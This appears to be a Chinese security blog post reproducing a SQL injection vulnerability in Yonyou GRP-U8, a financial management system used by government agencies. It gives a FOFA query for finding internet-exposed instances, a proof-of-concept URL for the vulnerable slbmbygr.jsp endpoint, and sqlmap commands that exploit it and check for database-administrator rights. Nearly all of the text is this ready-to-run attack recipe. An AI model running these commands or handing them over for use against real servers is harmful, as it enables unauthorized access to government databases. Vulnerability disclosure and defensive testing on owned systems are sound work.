【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞

文章目录

  • 一、漏洞描述
  • 二、网络空间搜索引擎搜索
  • 三、漏洞利用

一、漏洞描述

用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。
![在这里插入图片描述](https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png

二、网络空间搜索引擎搜索

fofa查询语法

app="用友-GRP-U8"

【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞_第1张图片

三、漏洞利用

POC:拼接/u8qx/slbmbygr.jsp?gsdm=1 访问
【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞_第2张图片漏洞存在
【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞_第3张图片

漏洞不存在

使用SQLmap进行注入利用

sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*"


查询当前用户权限

sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba    

【漏洞复现】用友GPR-U8 slbmbygr SQL注入漏洞_第4张图片

你可能感兴趣的:(#,漏洞复现,sql,数据库,安全)